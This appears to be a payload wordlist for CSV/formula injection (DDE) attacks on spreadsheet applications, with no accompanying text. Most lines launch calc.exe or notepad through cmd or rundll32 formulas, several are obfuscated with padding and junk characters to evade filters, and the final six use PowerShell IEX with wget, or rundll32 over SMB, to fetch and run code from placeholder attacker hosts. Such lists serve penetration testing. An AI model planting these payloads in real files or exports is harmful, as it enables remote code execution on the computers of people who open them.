DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
+thespanishinquisition(cmd|'/c calc.exe'!A
=         cmd|'/c calc.exe'!A
=rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
=    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A
=cmd|'/C powershell IEX(wget !-VARIABLE_VPS_IP-!:80/domain_csv.txt)'!A0
=cmd|'/C powershell IEX(wget !-VARIABLE_VPS_IP-!:80/ip_csv.txt)'!A0
=cmd|'/c rundll32.exe \\!-VARIABLE_VPS_IP_WITHOUT_HTTP-!\3\2\smb_csv.dll,0'!_xlbgnm.A1
=cmd|'/C powershell IEX(wget !-VARIABLE_COLLABORATOR-!/domain_csv.txt)'!A0
=cmd|'/C powershell IEX(wget !-VARIABLE_COLLABORATOR-!/ip_csv.txt)'!A0
=cmd|'/c rundll32.exe \\!-VARIABLE_COLLABORATOR_WITHOUT_HTTP-!\3\2\smb_csv.dll,0'!_xlbgnm.A1
